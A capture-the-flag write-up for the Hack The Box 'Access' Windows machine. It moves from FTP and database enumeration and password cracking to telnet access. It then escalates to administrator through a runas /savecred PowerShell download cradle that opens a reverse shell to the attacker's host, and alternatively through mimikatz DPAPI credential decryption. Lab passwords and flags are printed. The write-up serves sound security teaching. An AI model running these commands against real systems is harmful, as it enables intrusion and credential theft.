HTB- Access

Enumeration

---

Scope

IP Address: 10.10.10.98

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
23/tcp open  telnet  syn-ack
80/tcp open  http    syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p21,23,80 $ip -sCV -oN Nmap/script-scan

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

* Open ports: 21 - 23 - 80
* UDP Open ports: None
* Services: FTP - TELNET - HTTP
* Versions:
* Important Notes:

Enumeration

HTTP The webapp didn't reveal anything except this image at http://10.10.10.98

FTP I'm used to downloading all files on ftp server by one command and explore them locally

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip 

<snip>
FINISHED --2024-07-07 11:19:01--
Total wall clock time: 1m 4s
Downloaded: 5 files, 5.4M in 43s (129 KB/s)

all files downloaded in 10.10.10.98 folder

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ ls
10.10.10.98 Nmap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ tree 10.10.10.98  
10.10.10.98
├── Backups
│   └── backup.mdb
└── Engineer
    └── Access Control.zip

Looking into zip file, it contains a .pst file and also encrypted

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ unzip -l 10.10.10.98/Engineer/Access\ Control.zip
Archive:  10.10.10.98/Engineer/Access Control.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
   271360  2018-08-24 01:13   Access Control.pst

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Engineer/Access\ Control.zip                                            
10.10.10.98/Engineer/Access Control.zip: Zip archive data, at least v2.0 to extract, compress
ion method=AES Encrypted 

I will get the hash with john the ripper and attempt to crack it

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ zip2john Access\ Control.zip > zip.hash

Cracking Failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt   

<snip>
Session completed. 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --show                                     
0 password hashes cracked, 1 left

I want to know what is that file and from the output below it's Microsoft Access Database

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Backups/backup.mdb 
10.10.10.98/Backups/backup.mdb: Microsoft Access Database

I had to move it to windows host and explore it.

I found a table that contain usernames & passwords

admin:admin
engineer:access4u@security
backup_admin:admin

I will try to telnet with these credentials since, there is no SMB protocol

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ hydra -L users.lst -P passwords.list telnet://$ip

1 of 1 target completed, 0 valid password found

Initial Access

---

I remember that I couldn't crack the zip file, So I will try these passwords to decrypt the file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=passwords.list                  

<snip>
access4u@security (Access Control.zip/Access Control.pst) 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ 7z x Access\ Control.zip                                                                           
<snip>
Enter password (will not be echoed):

Everything is Ok

Size:       271360
Compressed: 10870

It revealed Access Control.pst file and I wanted to know what its type

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file Access\ Control.pst 
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e

It's Microsoft Outlook Personal Storage, I moved it to my windows host and opened it with outlook

It contains an email with the following data

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,
John

So, We get a new credentials security:4Cc3ssC0ntr0ller and I will try it on telnet

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip     

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>

C:\Users\security>type Desktop\user.txt
713d8fafce27a927227b6a3124c79ea3

User Flag: 713d8fafce27a927227b6a3124c79ea3

---

Privilege Escalation

When I land on any windows machine on HTB, I always run cmdkey /list to view saved credentials

C:\Users>cmdkey /list

Currently stored credentials:
    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator    

This can be abused to run as admin with runas command.

Since we can't execute .exe files, I will try to execute .ps1 as administrator, So I grep Invoke-PowerShellTcp.ps1 from my host, start webserver & nc listener and execute the command as administrator

We must add this line before executing the shell to Invoke-PowerShellTcp.ps1

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 443

Change IP & Port to yours when modifying the file

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ python3 -m http.server 80

Netcat listener

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443

C:\Users\security> runas /savecred /user:ACCESS\Administrator "PowerShell -c IEX (New-Object Net.webclient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ web-server                                        
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [08/Jul/2024 05:31:42] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.98] 49161

PS C:\Windows\system32>whoami 
access\administrator

PS C:\Windows\system32> cd C:\Users\administrator\Desktop\
PS C:\Users\administrator\Desktop> type root.txt
066b2ca40b4ab07b4387c6e4fe06bc32

Root Flag: 066b2ca40b4ab07b4387c6e4fe06bc32

Alternative path

Since the administrator credentials is stored in security user session, We can get the credentials by decrypting DPAPI secrets

We must have two files masterkey & credentials and there are located in current user directory under C:\Users\Security\AppData\Roaming\Microsoft\ but hidden.

I personally use ls with -Force flag to list hidden files

C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\


    Directory: C:\Users\Security\AppData\Roaming\Microsoft

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
<snip>
d---s         8/22/2018  10:18 PM            Credentials
d---s         8/22/2018  10:18 PM            Protect
<snip>

C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Protect

    Directory: C:\Users\Security\AppData\Roaming\Microsoft\Protect

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d---s         8/22/2018  10:18 PM            S-1-5-21-953262931-566350628-63446256-1001
-a-hs         8/22/2018  10:18 PM         24 CREDHIST

C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Credentials

    Directory: C:\Users\Security\AppData\Roaming\Microsoft\Credentials

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a-hs         8/22/2018  10:18 PM        538 51AB168BE4BDB3A603DADE4F8CA81290

I will encode the two files as base64 and decode them in my attack host

C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262
931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580 .\key                                               
CertUtil: -encode command completed successfully.

C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Credentials\51AB168BE4B
DB3A603DADE4F8CA81290 .\key1                                                                                       
CertUtil: -encode command completed successfully. 

C:\Users\security>type key                                                                                      
-----BEGIN CERTIFICATE-----
AgAAAAAAAAAAAAAAMAA3ADkAMgBjADMAMgBlAC0ANAA4AGEANQAtADQAZgBlADMA
LQA4AGIANAAzAC0AZAA5ADMAZAA2ADQANQA5ADAANQA4ADAAAAAAAAAAAAAFAAAA
sAAAAAAAAACQAAAAAAAAABQAAAAAAAAAAAAAAAAAAAACAAAAnFHKTQBwjHPU+/9g
uV5UnvhDAAAOgAAAEGYAAOePsdmJxMzXoFKFwX+uHDGtEhD3raBRrjIDU232E+Y6
DkZHyp7VFAdjfYwcwq0WsjBqq1bX0nB7DHdCLn3jnri9/MpVBEtKf4U7bwszMyE7
Ww2Ax8ECH2xKwvX6N3KtvlCvf98HsODqlA1woSRdt9+Ef2FVMKk4lQEqOtnHqMOc
wFktBtcUye6P40ztUGLEEgIAAABLtt2bW5ZW2Xt48RR5ZFf0+EMAAA6AAAAQZgAA
D+azql3Tr0a9eofLwBYfxBrhP4cUoivLW9qG8k2VrQM2mlM1FZGF0CdnQ9DBEys1
/a/60kfTxPX0MmBBPCi0Ae1w5C4BhPnoxGaKvDbrcye9LHN0ojgbTN1Op8Rl3qp1
Xg9TZyRzkA24hotCgyftqgMAAADlaJYABZMbQLoN36DhGzTQ
-----END CERTIFICATE-----

C:\Users\security>type key1                                                                                      
-----BEGIN CERTIFICATE-----
AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6VI40+LQ9k9
ZFkFgAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQA
aQBhAGwAIABEAGEAdABhAA0ACgAAABBmAAAAAQAAIAAAAPW7usJAvZDZr308LPt/
MB8fEjrJTQejzAEgOBNfpaa8AAAAAA6AAAAAAgAAIAAAAPlkLTI/rjZqT3KT0C8m
5Ecq3DKwC6xqBhkURY2t/T5SAAEAAOc1Qv9x0IUp+dpf+I7c1b5E0RycAsRf39nu
WlMWKMsPno3CIetbTYOoV6/xNHMTHJJ1JyF/4XfgjWOmPrXOU0FXazMzKAbgYjY+
WHhvt1Uaqi4GdrjjlX9Dzx8Rou0UnEMRBOX5PyA2SRbfJaAWjt4jeIvZ1xGSzbZh
xcVobtJWyGkQV/5v4qKxdlugl57pFAwBAhDuqBrACDD3TDWhlqwfRr1p16hsqC2h
X5u88cQMu+QdWNSokkr96X4qmabp8zopfvJQhAHCKaRRuRHpRpuhfXEojcbDfuJs
ZezIrM1LWzwMLM/K5rCnY4Sg4nxO23oOzs4q/ZiJJSME21dnu8NAAAAAY/zBU7zW
C+/QdKUJjqDlUviAlWLFU5hbqocgqCjmHgW9XRy4IAcRVRoQDtO4U1mLOHW6kLaJ
vEgzQvv2cbicmQ==
-----END CERTIFICATE-----

On windows host:

mimikatz # dpapi::masterkey /in:C:\Users\HTB\Desktop\masterkey /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 9c51ca4d00708c73d4fbff60b95e549e
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 4bb6dd9b5b9656d97b78f114796457f4
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa

[credhist]
  **CREDHIST INFO**
    dwVersion        : 00000003 - 3
    guid             : {009668e5-9305-401b-ba0d-dfa0e11b34d0}



[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
  key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
  sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe

Decrypting credentials file with masterkey

Note: We can provide the masterkey with /masterkey:<key> but mimikatz does it automatically

mimikatz # dpapi::cred /in:C:\Users\HTB\Desktop\credentials
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
  dwDataLen          : 00000100 - 256
  pbData             : e73542ff71d08529f9da5ff88edcd5be44d11c9c02c45fdfd9ee5a531628cb0f9e8dc221eb5b4d83a857aff13473131c927527217fe177e08d63a63eb5ce5341576b33332806e062363e58786fb7551aaa2e0676b8e3957f43cf1f11a2ed149c431104e5f93f20364916df25a0168ede23788bd9d71192cdb661c5c5686ed256c8691057fe6fe2a2b1765ba0979ee9140c010210eea81ac00830f74c35a196ac1f46bd69d7a86ca82da15f9bbcf1c40cbbe41d58d4a8924afde97e2a99a6e9f33a297ef2508401c229a451b911e9469ba17d71288dc6c37ee26c65ecc8accd4b5b3c0c2ccfcae6b0a76384a0e27c4edb7a0ecece2afd9889252304db5767bbc3
  dwSignLen          : 00000040 - 64
  pbSign             : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99

Decrypting Credential:
 * volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe;Key:available
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000f4 - 244
  credUnk0       : 00002004 - 8196

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 8/22/2018 9:18:49 PM
  unkFlagsOrSize : 00000038 - 56
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=ACCESS\Administrator
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : ACCESS\Administrator
  CredentialBlob : 55Acc3ssS3cur1ty@megacorp
  Attributes     : 0

So, the admin credentials are administrator:55Acc3ssS3cur1ty@megacorp

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip

login: administrator
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>type Desktop\root.txt
066b2ca40b4ab07b43xxxxxxxxxxxxx